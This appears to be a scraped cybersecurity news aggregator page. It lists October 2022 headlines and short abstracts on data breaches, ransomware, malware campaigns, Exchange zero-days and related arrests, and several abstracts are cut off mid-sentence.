The AFP (Australian Federal Police) have arrested a 19-year-old man in Sydney and charged him for allegedly using leaked Optus customer data for extortion.BleepingComputer
October 6, 2022 – Attack
Lloyd’s of London investigates possible cyber attack Full Text
Abstract
"Lloyd’s has detected unusual activity on its network and we are investigating the issue," a Lloyd's spokesperson said by email, adding that the market was resetting the network.Reuters
October 06, 2022 – Policy and Law
Former Uber Security Chief Found Guilty of Data Breach Coverup Full Text
Abstract
A U.S. federal court jury has found former Uber Chief Security Officer Joseph Sullivan guilty of not disclosing a 2016 breach of customer and driver records to regulators and attempting to cover up the incident. Sullivan has been convicted on two counts: One for obstructing justice by not reporting the incident and another for misprision. He faces a maximum of five years in prison for the obstruction charge, and a maximum of three years for the latter. "Technology companies in the Northern District of California collect and store vast amounts of data from users," U.S. Attorney Stephanie M. Hinds said in a press statement. "We expect those companies to protect that data and to alert customers and appropriate authorities when such data is stolen by hackers. Sullivan affirmatively worked to hide the data breach from the Federal Trade Commission and took steps to prevent the hackers from being caught." The 2016 hack of Uber occurred as a result of two hackers gaThe Hacker News
October 6, 2022 – Breach
“Egypt Leaks” – Hacktivists are Leaking Financial Data Full Text
Abstract
Researchers at cybersecurity firm Resecurity spotted a new group of hacktivists targeting financial institutions in Egypt, Resecurity, a California-based cybersecurity company protecting Fortune 500 corporations globally, has noticed a new group of hacktivists...Security Affairs
October 6, 2022 – Business
Kocho acquires Mobliciti to strengthen its mobile management and security capabilities Full Text
Abstract
The deal adds strategic mobile management and security capabilities to Kocho’s portfolio, allowing customers of both organizations to benefit from an end-to-end range of services that will further accelerate their digital transformation programs.Help Net Security
October 6, 2022 – Breach
Former Uber CSO Joe Sullivan found guilty in breach cover-up Full Text
Abstract
A federal jury found Sullivan guilty of obstruction of proceedings of the Federal Trade Commission (FTC) and misprision of a felony in connection with attempting to conceal the Uber breach and pay off the hackers through a bug bounty award.Tech Target
October 6, 2022 – Vulnerabilities
Dex patches authentication bug that enabled unauthorized access to client applications Full Text
Abstract
OpenID Connect (OIDC) identity service Dex has patched a critical vulnerability that would allow an attacker to fetch an ID token through an intercepted authorization code and potentially gain unauthorized access to client applications.The Daily Swig
October 05, 2022 – Ransomware
Avast releases free decryptor for MafiaWare666 ransomware variants Full Text
Abstract
Avast has released a decryptor for variants of the MafiaWare666 ransomware known as 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt,' allowing victims to recover their files for free.BleepingComputer
October 05, 2022 – Government
FBI: Cyberattacks targeting election systems unlikely to affect results Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) in a public service announcement says that cyber activity attempting to compromise election infrastructure is unlikely to cause a massive disruption or prevent voting.BleepingComputer
October 5, 2022 – Ransomware
Conti Ransomware: The History Behind One of the World’s Most Aggressive RaaS Groups Full Text
Abstract
The Conti ransomware group has become one of the most notorious cybercrime collectives in the world, known for its aggressive tactics and large-scale attacks against a wide range of public and private organizations.Flashpoint
October 05, 2022 – Privacy
Experts Warn of New RatMilad Android Spyware Targeting Enterprise Devices Full Text
Abstract
A novel Android malware called RatMilad has been observed targeting a Middle Eastern enterprise mobile device by concealing itself as a VPN and phone number spoofing app. The mobile trojan functions as advanced spyware with capabilities that receives and executes commands to collect and exfiltrate a wide variety of data from the infected mobile endpoint, Zimperium said in a report shared with The Hacker News. Evidence gathered by the mobile security company shows that the malicious app is distributed through links on social media and communication tools like Telegram, tricking unsuspecting users into sideloading the app and granting it extensive permissions. The idea behind embedding the malware within a fake VPN and phone number spoofing service is also clever in that the app claims to enable users to verify social media accounts via phone, a technique popular in countries where access is restricted. "Once installed and in control, the attackers could access the camera toThe Hacker News
October 5, 2022 – Ransomware
Avast releases a free decryptor for some Hades ransomware variants Full Text
Abstract
Avast released a free decryptor for variants of the Hades ransomware tracked as 'MafiaWare666', 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt,' . Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt', 'RIP...Security Affairs
October 05, 2022 – Ransomware
BlackByte ransomware abuses legit driver to disable security products Full Text
Abstract
The BlackByte ransomware gang is using a new technique that researchers are calling "Bring Your Own Driver," which enables bypassing protections by disabling more than 1,000 drivers used by various security solutions.BleepingComputer
October 5, 2022 – Insider Threat
8 strange ways employees can (accidently) expose data Full Text
Abstract
From eyeglass reflections and new job postings to certificate transparency logs and discarded printers, employees can involuntarily and unintentionally expose confidential data in odd ways.CSO Online
October 05, 2022 – Breach
Telstra Telecom Suffers Data Breach Potentially Exposing Employee Information Full Text
Abstract
Australia's largest telecommunications company Telstra disclosed that it was the victim of a data breach through a third-party, nearly two weeks after Optus reported a breach of its own. "There has been no breach of Telstra's systems," Narelle Devine, the company's chief information security officer for the Asia Pacific region, said . "And no customer account data was involved." It said the breach targeted a third-party platform called Work Life NAB that's no longer actively used by the company, and that the leaked data posted on the internet concerned a "now-obsolete Telstra employee rewards program." Telstra also noted it became aware of the breach last week, adding the information included first and last names and the email addresses used to sign up for the program. It further clarified that the data posted was from 2017. The data was "basic in nature," Devine said. The company did not reveal how many employees werThe Hacker News
October 5, 2022 – Malware
New Maggie malware already infected over 250 Microsoft SQL servers Full Text
Abstract
Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie,...Security Affairs
October 05, 2022 – Ransomware
Avast releases free decryptor for Hades ransomware variants Full Text
Abstract
Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt,' allowing victims to recover their files for free.BleepingComputer
October 5, 2022 – Attack
New Zealand: Cyberattack on health provider Pinnacle potentially impacts thousands of patients’ data Full Text
Abstract
Health workers are scrambling to deal with a cyber attack that has compromised details kept by Waikato and Bay of Plenty health provider Pinnacle, which operates dozens of GP practices.Stuff NZ
October 05, 2022 – Government
FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization Full Text
Abstract
U.S. cybersecurity and intelligence agencies on Tuesday disclosed that multiple nation-state hacking groups potentially targeted a "Defense Industrial Base (DIB) Sector organization's enterprise network" as part of a cyber espionage campaign. "[Advanced persistent threat] actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim's sensitive data," the authorities said . The joint advisory , which was authored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA), said the adversaries likely had long-term access to the compromised environment. The findings are the result of CISA's incident response efforts in collaboration with a trusted third-party security firm from November 2021 through January 20The Hacker News
October 5, 2022 – Breach
Telstra Telecom discloses data breach impacting former and current employees Full Text
Abstract
Bad news for the Australian telecommunications industry, the largest company in the country Telstra suffered a data breach. Australia's largest telecommunications company Telstra disclosed a data breach through a third-party supplier. The company...Security Affairs
October 05, 2022 – Breach
City of Tucson discloses data breach affecting over 125,000 people Full Text
Abstract
The City of Tucson, Arizona, has disclosed a data breach affecting the personal information of more than 125,000 individuals.BleepingComputer
October 5, 2022 – Ransomware
This is how half of ransomware attacks begin, and this is how you can stop them Full Text
Abstract
Over half of ransomware attacks now begin with criminals exploiting vulnerabilities in remote and internet-facing systems as hackers look to take advantage of unpatched cybersecurity issues.ZDNet
October 05, 2022 – General
Want More Secure Software? Start Recognizing Security-Skilled Developers Full Text
Abstract
Professional developers want to do the right thing, but in terms of security, they are rarely set up for success. Organizations must support their upskilling with precision training and incentives if they want secure software from the ground up. The cyber threat landscape grows more complex by the day, with our data widely considered highly desirable "digital gold". Attackers are constantly scanning networks for vulnerable applications, programs, cloud instances, and the latest flavor of the month is APIs, with Gartner correctly predicting that they would become the most common attack vector in 2022, and that is in no small part thanks to their often lax security controls. Threat actors are so persistent that new apps can sometimes be compromised and exploited within hours of deployment. The Verizon 2022 Data Breach Investigations Report reveals that errors and misconfigurations were the cause of 13% of breaches, with the human element responsible overall for 82% of the 23,000The Hacker News
October 5, 2022 – Malware
OnionPoison: malicious Tor Browser installer served through a popular Chinese YouTube channel Full Text
Abstract
OnionPoison: researchers reported that an infected Tor Browser installer has been distributed through a popular YouTube channel. Kaspersky researchers discovered that a trojanized version of a Windows installer for the Tor Browser has been distributed...Security Affairs
October 05, 2022 – Breach
Hundreds of Microsoft SQL servers backdoored with new malware Full Text
Abstract
Security researchers have found a new piece of malware targeting Microsoft SQL servers. Named Maggie, the backdoor has already infected hundreds of machines all over the world.BleepingComputer
October 5, 2022 – Business
RealDefense Raises $30 Million to Acquire More Privacy, Cybersecurity Firms Full Text
Abstract
The Pasadena, California-based firm this week announced that it has raised $30 million in debt financing from Sunflower Bank, which brings the total investment in the company to $50 million.Security Week
October 05, 2022 – Policy and Law
Canadian Netwalker Ransomware Affiliate Sentenced to 20 Years in U.S. Prison Full Text
Abstract
A former affiliate of the Netwalker ransomware has been sentenced to 20 years in prison in the U.S., a little over three months after the Canadian national pleaded guilty to his role in the crimes. Sebastien Vachon-Desjardins, 35, has also been ordered to forfeit $21,500,000 that was illicitly obtained from dozens of victims globally, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities. Launched in 2019, the Netwalker attacks particularly singled out the healthcare sector during the COVID-19 pandemic, opportunistically taking advantage of the situation to extort money from victims. "The defendant in this case used sophisticated technological means to exploit hundreds of victims in numerous countries at the height of an international health crisis," U.S. Attorney Roger B. Handberg for the Middle District of Florida said . Vachon-Desjardins, an IT engineer working for the Canadian governmentThe Hacker News
October 05, 2022 – Breach
CommonSpirit US nonprofit health system discloses security incident Full Text
Abstract
CommonSpirit Health, one of the largest nonprofit health systems in the United States, says it took down some of its IT systems because of a security incident that has impacted multiple facilities.BleepingComputer
October 5, 2022 – Breach
CommonSpirit Health Suffers ‘IT Security Incident’ Impacting Facilities in Multiple Regions Full Text
Abstract
CommonSpirit Health, one of the nation’s largest health systems, said it experienced an “IT security incident” on Monday at an undisclosed number of facilities in multiple regions.Cybersecurity Dive
October 05, 2022 – Vulnerabilities
Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds Full Text
Abstract
Microsoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed. The two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed ProxyNotShell due to similarities to another set of flaws called ProxyShell , which the tech giant resolved last year. In-the-wild attacks abusing the shortcomings have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells. The Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted attacks. In the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager. However, accordingThe Hacker News
October 05, 2022 – Vulnerabilities
Microsoft updates mitigation for ProxyNotShell Exchange zero days Full Text
Abstract
Microsoft has updated the mitigation for the latest Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, also referred to ProxyNotShell.BleepingComputer
October 5, 2022 – Breach
Australian Staff at Security Firm G4S on Alert After Tax Numbers and Bank Details Posted Online Full Text
Abstract
Current and former Australian employees of security firm G4S have been told to be on alert after personal information – including tax file numbers, bank account information, and medical checks – was stolen and posted online in a ransomware attack.The Guardian
October 05, 2022 – Malware
New Android malware ‘RatMilad’ can steal your data, record audio Full Text
Abstract
A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data.BleepingComputer
October 04, 2022 – Hacker
Hackers stole data from US defense org using Impacket, CovalentStealer Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 04, 2022 – Government
US Govt: Hackers stole data from US defense org using new malware Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 4, 2022 – Hacker
Witchetty Group Uses Steganography To Target Middle East Entities Full Text
Abstract
In an ongoing cyberespionage campaign, hacking group Witchetty has been found targeting two governments in the Middle East and a stock exchange in Africa. Among the new tools used by the group is a backdoor named Stegmap. The malware is distributed via the rarely used steganography technique.Cyware Alerts - Hacker News
October 04, 2022 – Criminals
Russian Hacker Arrested in India for Reportedly Helping Students Cheat in JEE-Main Exam Full Text
Abstract
India's Central Bureau of Investigation (CBI) on Monday disclosed that it has detained a Russian national for allegedly hacking into a software platform used to conduct engineering entrance assessments in the country in 2021. "The said accused was detained by the Bureau of Immigration at Indira Gandhi International Airport, Delhi while arriving in India from Almaty, Kazakhstan," the primary investigating agency said in a press release. The name of the individual was not disclosed by the agency, but Indian news reports identified the person as Mikhail Shargin . The CBI further said that Shargin's role was uncovered as part of its investigation into alleged irregularities committed in the Joint Entrance Examination ( JEE-Main ) conducted last year. JEE is a standardized test used for admissions to engineering colleges in India. The September 2021 incident, per the agency, involved breaking into iLeon software, the platform on which the exam was held, with the gThe Hacker News
October 4, 2022 – Vulnerabilities
A flaw in the Packagist PHP repository could have allowed supply chain attacks Full Text
Abstract
Experts disclosed a flaw in the PHP software package repository Packagist that could have been exploited to carry out supply chain attacks. SonarSource Researchers disclosed details about a now-fixed vulnerability (CVE-2022-24828) in PHP software...Security Affairs
October 04, 2022 – Policy and Law
Netwalker ransomware affiliate sentenced to 20 years in prison Full Text
Abstract
Former Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and demanded to forfeit $21.5 million for his attacks on a Tampa company and other entities.BleepingComputer
October 4, 2022 – Vulnerabilities
Hackers Target Zero-Days in Microsoft Exchange Full Text
Abstract
Vietnamese cybersecurity company GTSC uncovered a zero-day in fully patched Microsoft Exchange servers. The flaws are being tracked (by Zero Day Initiative) as ZDI-CAN-18333 with a CVSS score of 8.8 and ZDI-CAN-18802 with a CVSS score of 6.3. The bug could be abused by attackers to achieve remote a ... Read MoreCyware Alerts - Hacker News
October 04, 2022 – Phishing
Popular YouTube Channel Caught Distributing Malicious Tor Browser Installer Full Text
Abstract
A popular Chinese-language YouTube channel has emerged as a means to distribute a trojanized version of a Windows installer for the Tor Browser. Kaspersky dubbed the campaign OnionPoison , with all of the victims located in China. The scale of the attack remains unclear, but the Russian cybersecurity company said it detected victims appearing in its telemetry in March 2022. The malicious version of the Tor Browser installer is being distributed via a link present in the description of a video that was uploaded to YouTube on January 9, 2022. It has been viewed over 64,500 times to date. The channel hosting the video has 181,000 subscribers and claims to be based in Hong Kong. The video is still available to watch on the social media platform as of writing. The attack banks on the fact that the actual Tor Browser website is blocked in China, thus tricking unsuspecting users searching for "Tor浏览器" (i.e., Tor Browser in Chinese) on YouTube into potentially downloading thThe Hacker News
October 4, 2022 – APT
Lazarus APT employed an exploit in a Dell firmware driver in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on exploit in a Dell...Security Affairs
October 04, 2022 – Cryptocurrency
Hackers are breaching scam sites to hijack crypto transactions Full Text
Abstract
In a perfect example of there being no honor among thieves, a threat actor named 'Water Labbu' is hacking into cryptocurrency scam sites to inject malicious JavaScript that steals funds from the scammer's victims.BleepingComputer
October 4, 2022 – Malware
Malicious Tor Browser spreads through YouTube Full Text
Abstract
One of the libraries bundled with the malicious Tor Browser is infected with spyware that collects various personal data and sends it to a command and control server. It also gives attackers the ability to execute shell commands.Securelist
October 04, 2022 – Vulnerabilities
Researchers Report Supply Chain Vulnerability in Packagist PHP Repository Full Text
Abstract
Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks. "This vulnerability allows gaining control of Packagist ," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects. The disclosure comes as planting malware in open source repositories is turning into an attractive conduit for mounting software supply chain attacks . Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug ( CVE-2021-29472 ) that came to light in April 2021, suggesting an inadequate patch. "An attacker controlling a Git or Mercurial repository explicitly listed by URLThe Hacker News
October 4, 2022 – APT
Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group Full Text
Abstract
Researchers link recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber...Security Affairs
October 04, 2022 – Breach
Optus confirms 2.1 million ID numbers exposed in data breach Full Text
Abstract
Optus confirmed yesterday that 2.1 million customers had government identification numbers compromised during a cyberattack last month.BleepingComputer
October 4, 2022 – APT
SolarMarker APT Returns in a New Watering Hole Attack Full Text
Abstract
Digital adversaries behind the SolarMarker malware crippled a global tax consulting firm by camouflaging fake Chrome browser updates as part of watering hole attacks. Threat actors use the Google Dorking technique and conduct source code searches to identify such vulnerable websites before injectin ... Read MoreCyware Alerts - Hacker News
October 04, 2022 – General
Back to Basics: Cybersecurity’s Weakest Link Full Text
Abstract
A big promise with a big appeal. You hear that a lot in the world of cybersecurity, where you're often promised a fast, simple fix that will take care of all your cybersecurity needs, solving your security challenges in one go. It could be an AI-based tool, a new superior management tool, or something else – and it would probably be quite effective at what it promises to do. But is it a silver bullet for all your cybersecurity problems? No. There's no easy, technology-driven fix for what is really cybersecurity's biggest challenge: the actions of human beings. It doesn't matter how state-of-the-art your best defenses are. Perimeter firewalls, multi-tiered logins, multi-factor authentication, AI tools – all of these are easily rendered ineffective when Bob from a nondescript department clicks on a phishing link in an email. This isn't news to anyone We've all heard this before. The fact that humans are a key flaw in cybersecurity strategy is hardly news –The Hacker News
October 4, 2022 – Vulnerabilities
Microsoft mitigations for recently disclosed Exchange zero-days can be easily bypassed Full Text
Abstract
The mitigation shared by Microsoft for the two recently disclosed Exchange zero-day vulnerabilities can be bypassed, expert warns. Last week, Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers...Security Affairs
October 04, 2022 – Ransomware
Cheerscrypt ransomware linked to a Chinese hacking group Full Text
Abstract
The Cheerscrypt ransomware has been linked to a Chinese hacking group named 'Emperor Dragonfly,' known to frequently switch between ransomware families to evade attribution.BleepingComputer
October 4, 2022 – Vulnerabilities
JavaScript sandbox vm2 remediates remote code execution risk Full Text
Abstract
A bug in vm2, a popular JavaScript sandbox environment, could allow malicious actors to bypass sandbox protections and stage remote code execution (RCE) on the host device.The Daily Swig
October 04, 2022 – Policy and Law
BEC Scammer Gets 25-Year Jail Sentence for Stealing Over $9.5 Million Full Text
Abstract
A 46-year-old man in the U.S. has been sentenced to 25 years in prison after being found guilty of laundering over $9.5 million accrued by carrying out cyber-enabled financial fraud. Elvis Eghosa Ogiekpolor of Norcross, Georgia, operated a money laundering network that opened at least 50 business bank accounts for illicitly receiving funds from unsuspecting individuals and businesses after falling victim to romance frauds and business email compromise ( BEC ) scams. Ogiekpolor was charged by a federal grand jury in February 2022 with one count of conspiracy to commit money laundering and 15 counts of substantive money laundering. The scheme was operational from October 2018 to August 2020. According to the U.S. Justice Department (DoJ), Ogiekpolor enlisted the help of eight "money mules" to open the phony bank accounts under the names of non-existent companies, which were subsequently used to stash the proceeds from their criminal activities. These included creating ficThe Hacker News
October 04, 2022 – Government
FBI warns of “Pig Butchering” cryptocurrency investment schemes Full Text
Abstract
The Federal Bureau of Investigation (FBI) warns of a rise in 'Pig Butchering' cryptocurrency scams used to steal ever-increasing amounts of crypto from unsuspecting investors.BleepingComputer
October 4, 2022 – Vulnerabilities
Critical Vulnerabilities Expose Parking Management System to Hacker Attacks Full Text
Abstract
Nearly a dozen vulnerabilities have been found in a car parking management system made by Italian company Carlo Gavazzi, which makes electronic control components for building and industrial automation.Security Week
October 04, 2022 – Government
CISA Orders Federal Agencies to Regularly Track Network Assets and Vulnerabilities Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new Binding Operational Directive (BOD) that directs federal agencies in the country to keep track of assets and vulnerabilities on their networks six months from now. To that end, Federal Civilian Executive Branch (FCEB) enterprises have been tasked with two sets of activities: Asset discovery and vulnerability enumeration, which are seen as essential steps to gain "greater visibility into risks facing federal civilian networks." This involves carrying out automated asset discovery every seven days and initiating vulnerability enumeration across those discovered assets every 14 days by April 3, 2023, in addition to having the capabilities to do so on an on-demand basis within 72 hours of receiving a request from CISA. Similar baseline vulnerability enumeration obligations have also been put in place for Android and iOS devices as well as other devices that reside outside of agency on-premiseThe Hacker News
October 04, 2022 – Malware
ProxyNotShell – the New Proxy Hell? Full Text
Abstract
Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers. Based on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 – to permit a remote actor to execute arbitrary code. Despite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities. Meet ProxyNotShell Recorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enableThe Hacker News
October 03, 2022 – Breach
TD Bank discloses data breach after employee leaks customer info Full Text
Abstract
TD Bank has disclosed a data breach affecting an undisclosed number of customers whose personal information was stolen by a former employee and used to conduct financial fraud.BleepingComputer
October 3, 2022 – Government
Finnish intelligence warns of Russia’s cyberespionage activities Full Text
Abstract
The Finnish Security Intelligence Service (Suojelupoliisi or SUPO) warns of a highly likely intensification of cyberespionage activities conducted by Russia-linked threat actors over the winter.Security Affairs
October 03, 2022 – Attack
Comm100 Chat Provider Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
A threat actor likely with associations to China has been attributed to a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike said the attack made use of a signed Comm100 desktop agent app for Windows that was downloadable from the company's website. The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. Comm100 is a Canadian provider of live audio/video chat and customer engagement software for enterprises. It claims to have more than 15,000 customers across 51 countries. "The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate," the company noted , adding it remained available until September 29. EThe Hacker News
October 3, 2022 – General
Don’t Assume China’s AI Regulations Are Just a Power Play Full Text
Abstract
Commentators have framed new regulations on AI systems in China as part of an effort to micromanage algorithms. But this fails to address other possible rationales—and glosses over constraints inherent in regulating emerging technologies.Lawfare
October 3, 2022 – Malware
Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor Full Text
Abstract
A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100...Security Affairs
October 03, 2022 – Malware
Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub Full Text
Abstract
Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities.BleepingComputer
October 3, 2022 – Breach
Update: Optus reveals extent of data breach, but stays mum on how it happened Full Text
Abstract
Of the 9.8 million customers impacted by the data breach, 1.2 million have at least one form of identification number that is valid, says the Singtel-owned Australian operator, adding that it has brought in Deloitte to investigate the breach.ZDNet
October 03, 2022 – Ransomware
Researchers Link Cheerscrypt Linux-Based Ransomware to Chinese Hackers Full Text
Abstract
The recently discovered Linux-Based ransomware strain known as Cheerscrypt has been attributed to a Chinese cyber espionage group known for operating short-lived ransomware schemes . Cybersecurity firm Sygnia attributed the attacks to a threat actor it tracks under the name Emperor Dragonfly, which is also known as Bronze Starlight (Secureworks) and DEV-0401 (Microsoft). "Emperor Dragonfly deployed open source tools that were written by Chinese developers for Chinese users," the company said in a report shared with The Hacker News. "This reinforces claims that the 'Emperor Dragonfly' ransomware operators are based in China." The use of Cheerscrypt is the latest addition to a long list of ransomware families previously deployed by the group in little over a year, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. Secureworks, in its profile of the group, noted "it is plausible that Bronze Starlight deploys ransomware as a sThe Hacker News
October 3, 2022 – Criminals
RansomEXX gang claims to have hacked Ferrari and leaked online internal documents Full Text
Abstract
The Italian luxury sports car manufacturer Ferrari confirmed the availability of internal documents online, but said it has no evidence of cyber attack. Documents belonging to the Italian luxury sports car manufacturer Ferrari are circulating online,...Security Affairs
October 03, 2022 – Breach
Russian retail chain ‘DNS’ confirms hack after data leaked online Full Text
Abstract
Russian retail chain 'DNS' (Digital Network System) disclosed yesterday that they suffered a data breach that allegedly exposed the personal information of 16 million customers and employees.BleepingComputer
October 3, 2022 – General
Many IT pros don’t think a ransomware attack can impact Microsoft 365 data Full Text
Abstract
The 2022 Ransomware Report by Hornetsecurity, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year.Help Net Security
October 03, 2022 – Vulnerabilities
Hackers Exploiting Dell Driver Vulnerability to Deploy Rootkit on Targeted Computers Full Text
Abstract
The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver, highlighting new tactics adopted by the state-sponsored adversary. The Bring Your Own Vulnerable Driver ( BYOVD ) attack, which took place in the autumn of 2021, is another variant of the threat actor's espionage-oriented activity called Operation In(ter)ception that's directed against aerospace and defense industries. "The campaign started with spear-phishing emails containing malicious Amazon-themed documents and targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium," ESET researcher Peter Kálnai said . Attack chains unfolded upon the opening of the lure documents, leading to the distribution of malicious droppers that were trojanized versions of open source projects, corroborating recent reports from Google's Mandiant and Microsoft . ESET said it uncovered evidThe Hacker News
October 3, 2022 – Government
Finnish intelligence warns of Russia’s cyberespionage activities Full Text
Abstract
The Finnish Security Intelligence Service (SUPO) warns Russia will highly likely intensify its cyber activity over the winter. The Finnish Security Intelligence Service (Suojelupoliisi or SUPO) warn of a highly likely intensification of cyberespionage...Security Affairs
October 03, 2022 – Breach
Live support service hacked to spread malware in supply chain attack Full Text
Abstract
The official installer for the Comm100 Live Chat application, a widely deployed SaaS (software-as-a-service) that businesses use for customer communication and website visitors, was trojanized as part of a new supply-chain attack.BleepingComputer
October 3, 2022 – Hacker
Analysis of DeftTorero TTPs in 2019–2021 Full Text
Abstract
During the intrusion analysis of DeftTorero’s webshells, researchers noted traces suggesting that the threat actor exploited a file upload form and/or a command injection flaw in a functional or staging website hosted on the target web server.Securelist
October 03, 2022 – Insider Threat
Ex-NSA Employee Arrested for Trying to Sell U.S. Secrets to a Foreign Government Full Text
Abstract
A former U.S. National Security Agency (NSA) employee has been arrested on charges of attempting to sell classified information to a foreign spy, who was actually an undercover agent working for the Federal Bureau of Investigation (FBI). Jareh Sebastian Dalke, 30, was employed at the NSA for less than a month from June 6, 2022, to July 1, 2022, serving as an Information Systems Security Designer as part of a temporary assignment in Washington D.C. According to an affidavit filed by the FBI, Dalke was also a member of the U.S. Army from about 2015 to 2018 and held a Secret security clearance, which he received in 2016. The defendant further held a Top Secret security clearance during his tenure at the NSA. "Between August and September 2022, Dalke used an encrypted email account to transmit excerpts of three classified documents he had obtained during his employment to an individual Dalke believed to be working for a foreign government," the Justice Department (DoJ) saiThe Hacker News
October 3, 2022 – Vulnerabilities
Reflected XSS bugs in Canon Medical ’s Vitrea View could expose patient info Full Text
Abstract
Trustwave researchers discovered two XSS flaws in Canon Medical ’s Vitrea View tool that could expose patient information. During a penetration test, Trustwave Spiderlabs’ researchers discovered two reflected cross-site scripting (XSS) vulnerabilities,...Security Affairs
October 03, 2022 – Phishing
Web browser app mode can be abused to make desktop phishing pages Full Text
Abstract
The app mode in Chromium-based browsers like Google Chrome and Microsoft Edge can be abused to create realistic-looking login screens that appear as desktop apps.BleepingComputer
October 3, 2022 – Breach
Commercial Chat Provider Comm100 Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
The attack featured a trojan malware delivered via an installer for Comm100’s Windows Desktop agent software, available on the company website and signed using a valid Comm100 certificate dated September 26, 2022, according to Crowdstrike.The Record
October 03, 2022 – Vulnerabilities
Microsoft Exchange server zero-day mitigation can be bypassed Full Text
Abstract
Microsoft has shared mitigations for two new Microsoft Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, but researchers warn that the mitigation for on-premise servers is far from enough.BleepingComputer
October 3, 2022 – Criminals
BlackCat Ransomware Gang Claims to Hack US Defense Contractor NJVC Full Text
Abstract
BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company will not pay the ransom. The company supports intelligence, defense, and geospatial organizations.Security Affairs
October 02, 2022 – Criminals
Ransomware gang leaks data stolen from LAUSD school system Full Text
Abstract
The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month.BleepingComputer
October 2, 2022 – Criminals
Hackers set Monday deadline for LAUSD to pay up or have private data posted on dark web Full Text
Abstract
A criminal syndicate has set a Monday deadline for the Los Angeles public school system to pay a ransom or have its data released on the dark web, which could potentially expose the confidential information of students and employees.LA Times
October 2, 2022 – Criminals
BlackCat ransomware gang claims to have hacked US defense contractor NJVC Full Text
Abstract
